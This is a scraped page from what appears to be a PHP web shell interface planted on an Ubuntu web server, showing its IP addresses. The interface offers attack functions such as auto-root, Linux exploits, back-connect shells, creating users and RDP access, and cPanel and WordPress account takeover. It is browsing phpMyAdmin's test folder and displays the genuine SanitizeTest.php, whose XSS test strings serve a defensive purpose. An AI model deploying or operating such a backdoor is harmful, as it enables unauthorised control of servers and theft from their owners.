Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 18.188.80.46
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
stage /
phpmyadmin /
tests /
unit /
[ HOME SHELL ]
Name
Size
Permission
Action
Advisory
[ DIR ]
drwxr-xr-x
Charsets
[ DIR ]
drwxr-xr-x
Command
[ DIR ]
drwxr-xr-x
Config
[ DIR ]
drwxr-xr-x
ConfigStorage
[ DIR ]
drwxr-xr-x
Container
[ DIR ]
drwxr-xr-x
Controllers
[ DIR ]
drwxr-xr-x
Crypto
[ DIR ]
drwxr-xr-x
Database
[ DIR ]
drwxr-xr-x
Dbal
[ DIR ]
drwxr-xr-x
Display
[ DIR ]
drwxr-xr-x
Engines
[ DIR ]
drwxr-xr-x
Error
[ DIR ]
drwxr-xr-x
Export
[ DIR ]
drwxr-xr-x
Gis
[ DIR ]
drwxr-xr-x
Html
[ DIR ]
drwxr-xr-x
Http
[ DIR ]
drwxr-xr-x
Identifiers
[ DIR ]
drwxr-xr-x
Import
[ DIR ]
drwxr-xr-x
Navigation
[ DIR ]
drwxr-xr-x
Partitioning
[ DIR ]
drwxr-xr-x
Plugins
[ DIR ]
drwxr-xr-x
Properties
[ DIR ]
drwxr-xr-x
Query
[ DIR ]
drwxr-xr-x
Replication
[ DIR ]
drwxr-xr-x
Routing
[ DIR ]
drwxr-xr-x
Server
[ DIR ]
drwxr-xr-x
Setup
[ DIR ]
drwxr-xr-x
Stubs
[ DIR ]
drwxr-xr-x
Table
[ DIR ]
drwxr-xr-x
Theme
[ DIR ]
drwxr-xr-x
Tracking
[ DIR ]
drwxr-xr-x
Triggers
[ DIR ]
drwxr-xr-x
Utils
[ DIR ]
drwxr-xr-x
WebAuthn
[ DIR ]
drwxr-xr-x
_data
[ DIR ]
drwxr-xr-x
AbstractTestCase.php
5.3
KB
-rw-r--r--
ApplicationTest.php
1.63
KB
-rw-r--r--
BookmarkTest.php
3.56
KB
-rw-r--r--
BrowseForeignersTest.php
6.29
KB
-rw-r--r--
CacheTest.php
3.02
KB
-rw-r--r--
CharsetsTest.php
5.3
KB
-rw-r--r--
ConfigTest.php
31.22
KB
-rw-r--r--
ConsoleTest.php
1.38
KB
-rw-r--r--
CoreTest.php
23.3
KB
-rw-r--r--
CreateAddFieldTest.php
19.21
KB
-rw-r--r--
DatabaseInterfaceTest.php
29.52
KB
-rw-r--r--
DbTableExistsTest.php
2.9
KB
-rw-r--r--
EncodingTest.php
5.89
KB
-rw-r--r--
EnvironmentTest.php
478
B
-rw-r--r--
FieldHelper.php
1.09
KB
-rw-r--r--
FieldMetadataTest.php
3.54
KB
-rw-r--r--
FileListingTest.php
3.54
KB
-rw-r--r--
FileTest.php
2.02
KB
-rw-r--r--
FlashMessagesTest.php
1.96
KB
-rw-r--r--
FontTest.php
6.13
KB
-rw-r--r--
FooterTest.php
5.19
KB
-rw-r--r--
GitTest.php
15.08
KB
-rw-r--r--
HeaderTest.php
11.05
KB
-rw-r--r--
IndexColumnTest.php
2.73
KB
-rw-r--r--
IndexTest.php
4.18
KB
-rw-r--r--
InsertEditTest.php
80.72
KB
-rw-r--r--
IpAllowDenyTest.php
6.62
KB
-rw-r--r--
LanguageTest.php
8.44
KB
-rw-r--r--
LinterTest.php
3.57
KB
-rw-r--r--
ListDatabaseTest.php
2.26
KB
-rw-r--r--
LoggingTest.php
570
B
-rw-r--r--
MenuTest.php
1.63
KB
-rw-r--r--
MessageTest.php
14.44
KB
-rw-r--r--
MimeTest.php
990
B
-rw-r--r--
NormalizationTest.php
15.38
KB
-rw-r--r--
OpenDocumentTest.php
1.67
KB
-rw-r--r--
OperationsTest.php
2.19
KB
-rw-r--r--
ParseAnalyzeTest.php
2.1
KB
-rw-r--r--
PdfTest.php
1.4
KB
-rw-r--r--
PluginsTest.php
4.69
KB
-rw-r--r--
ProfilingTest.php
730
B
-rw-r--r--
ResponseRendererTest.php
1.71
KB
-rw-r--r--
SanitizeTest.php
6.99
KB
-rw-r--r--
ScriptsTest.php
3.66
KB
-rw-r--r--
SessionTest.php
741
B
-rw-r--r--
ShowGrantsTest.php
1.78
KB
-rw-r--r--
SqlQueryFormTest.php
5.85
KB
-rw-r--r--
SqlTest.php
30.76
KB
-rw-r--r--
StorageEngineTest.php
18.19
KB
-rw-r--r--
SystemDatabaseTest.php
4.72
KB
-rw-r--r--
TemplateTest.php
5.61
KB
-rw-r--r--
TransformationsTest.php
10.52
KB
-rw-r--r--
TwoFactorTest.php
21.18
KB
-rw-r--r--
TypesByDatabaseVersionTest.php
31.86
KB
-rw-r--r--
TypesTest.php
20.45
KB
-rw-r--r--
UniqueConditionTest.php
13.26
KB
-rw-r--r--
UrlRedirectorTest.php
1.48
KB
-rw-r--r--
UrlTest.php
8.56
KB
-rw-r--r--
UserPasswordTest.php
2.5
KB
-rw-r--r--
UserPreferencesTest.php
12.02
KB
-rw-r--r--
UserPrivilegesFactoryTest.php
5.82
KB
-rw-r--r--
UtilTest.php
55.46
KB
-rw-r--r--
VersionInformationTest.php
9.62
KB
-rw-r--r--
VersionTest.php
1.25
KB
-rw-r--r--
ZipExtensionTest.php
5.31
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : SanitizeTest.php
<?php declare(strict_types=1); namespace PhpMyAdmin\Tests; use PhpMyAdmin\Sanitize; use PHPUnit\Framework\Attributes\CoversClass; use PHPUnit\Framework\Attributes\DataProvider; #[CoversClass(Sanitize::class)] class SanitizeTest extends AbstractTestCase { /** * Sets up the fixture, for example, opens a network connection. * This method is called before a test is executed. */ protected function setUp(): void { parent::setUp(); $this->setLanguage(); } /** * Tests for proper escaping of XSS. */ public function testXssInHref(): void { self::assertSame( '[a@javascript:alert('XSS');@target]link</a>', Sanitize::convertBBCode('[a@javascript:alert(\'XSS\');@target]link[/a]'), ); } /** * Tests correct generating of link redirector. */ public function testLink(): void { $lang = $GLOBALS['lang']; unset($GLOBALS['lang']); self::assertSame( '<a href="index.php?route=/url&url=https%3A%2F%2Fwww.phpmyadmin.net%2F" target="target">link</a>', Sanitize::convertBBCode('[a@https://www.phpmyadmin.net/@target]link[/a]'), ); $GLOBALS['lang'] = $lang; } /** * Tests links to documentation. * * @param string $link link * @param string $expected expected result */ #[DataProvider('docLinks')] public function testDoc(string $link, string $expected): void { self::assertSame( '<a href="index.php?route=/url&url=https%3A%2F%2Fdocs.phpmyadmin.net%2Fen%2Flatest%2F' . $expected . '" target="documentation">doclink</a>', Sanitize::convertBBCode('[doc@' . $link . ']doclink[/doc]'), ); } /** * Data provider for sanitize [doc@foo] markup * * @return mixed[] */ public static function docLinks(): array { return [ ['foo', 'setup.html%23foo'], ['cfg_TitleTable', 'config.html%23cfg_TitleTable'], ['faq3-11', 'faq.html%23faq3-11'], ['bookmarks@', 'bookmarks.html'], ]; } /** * Tests link target validation. */ public function testInvalidTarget(): void { self::assertSame( '[a@./Documentation.html@INVALID9]doc</a>', Sanitize::convertBBCode('[a@./Documentation.html@INVALID9]doc[/a]'), ); } /** * Tests XSS escaping after valid link. */ public function testLinkDocXss(): void { self::assertSame( '[a@./Documentation.html" onmouseover="alert(foo)"]doc</a>', Sanitize::convertBBCode('[a@./Documentation.html" onmouseover="alert(foo)"]doc[/a]'), ); } /** * Tests proper handling of multi link code. */ public function testLinkAndXssInHref(): void { self::assertSame( '<a href="index.php?route=/url&url=https%3A%2F%2Fdocs.phpmyadmin.net%2F">doc</a>' . '[a@javascript:alert('XSS');@target]link</a>', Sanitize::convertBBCode( '[a@https://docs.phpmyadmin.net/]doc[/a][a@javascript:alert(\'XSS\');@target]link[/a]', ), ); } /** * Test escaping of HTML tags */ public function testHtmlTags(): void { self::assertSame( '<div onclick="">', Sanitize::convertBBCode('<div onclick="">'), ); } /** * Tests basic BB code. */ public function testBBCode(): void { self::assertSame( '<strong>strong</strong>', Sanitize::convertBBCode('[strong]strong[/strong]'), ); } /** * Test for Sanitize::sanitizeFilename */ public function testSanitizeFilename(): void { self::assertSame( 'File_name_123', Sanitize::sanitizeFilename('File_name 123'), ); } /** * Test for Sanitize::getJsValue * * @param string $key Key * @param string|bool|int|string[] $value Value * @param string $expected Expected output */ #[DataProvider('variables')] public function testGetJsValue(string $key, string|bool|int|array $value, string $expected): void { self::assertSame($expected, Sanitize::getJsValue($key, $value)); } /** * Provider for testFormat * * @return mixed[] */ public static function variables(): array { return [ ['foo', true, "foo = true;\n"], ['foo', false, "foo = false;\n"], ['foo', 100, "foo = 100;\n"], ['foo', 0, "foo = 0;\n"], ['foo', 'text', "foo = \"text\";\n"], ['foo', 'quote"', "foo = \"quote\\\"\";\n"], ['foo', 'apostroph\'', "foo = \"apostroph'\";\n"], ['foo', ['1', '2', '3'], "foo = [\"1\",\"2\",\"3\"];\n"], ['foo', 'bar"baz', "foo = \"bar\\\"baz\";\n"], ]; } /** * Test for removeRequestVars */ public function testRemoveRequestVars(): void { $GLOBALS['_POST'] = []; $_REQUEST['foo'] = 'bar'; $_REQUEST['allow'] = 'all'; $_REQUEST['second'] = 1; $allowList = ['allow', 'second']; Sanitize::removeRequestVars($allowList); self::assertArrayNotHasKey('foo', $_REQUEST); self::assertArrayNotHasKey('second', $_REQUEST); self::assertArrayHasKey('allow', $_REQUEST); } /** * Data provider for sanitize links * * @return mixed[] */ public static function dataProviderCheckLinks(): array { // Expected // The url // Allow http links // Allow other links return [ [false, 'foo', false, false], [true, './docs/html/', false, false], [false, 'index.php', false, false], [false, './index.php', false, false], [true, './index.php?', false, false], [true, './index.php?route=/server/sql', false, false], [false, 'index.php?route=/server/sql', false, false], [false, 'ftp://ftp.example.com', false, false], [true, 'ftp://ftp.example.com', false, true], [false, 'mailto:admin@domain.tld', false, false], [true, 'mailto:admin@domain.tld', false, true], [false, 'index.php?route=/url&url=https://example.com', false, false], [true, 'index.php?route=/url&url=https%3a%2f%2fexample.com', false, false], [true, 'https://example.com', false, false], [false, 'http://example.com', false, false], [true, 'http://example.com', true, false], ]; } /** * Tests link sanitize */ #[DataProvider('dataProviderCheckLinks')] public function testCheckLink(bool $expected, string $url, bool $http, bool $other): void { self::assertSame( $expected, Sanitize::checkLink($url, $http, $other), ); } }
Close
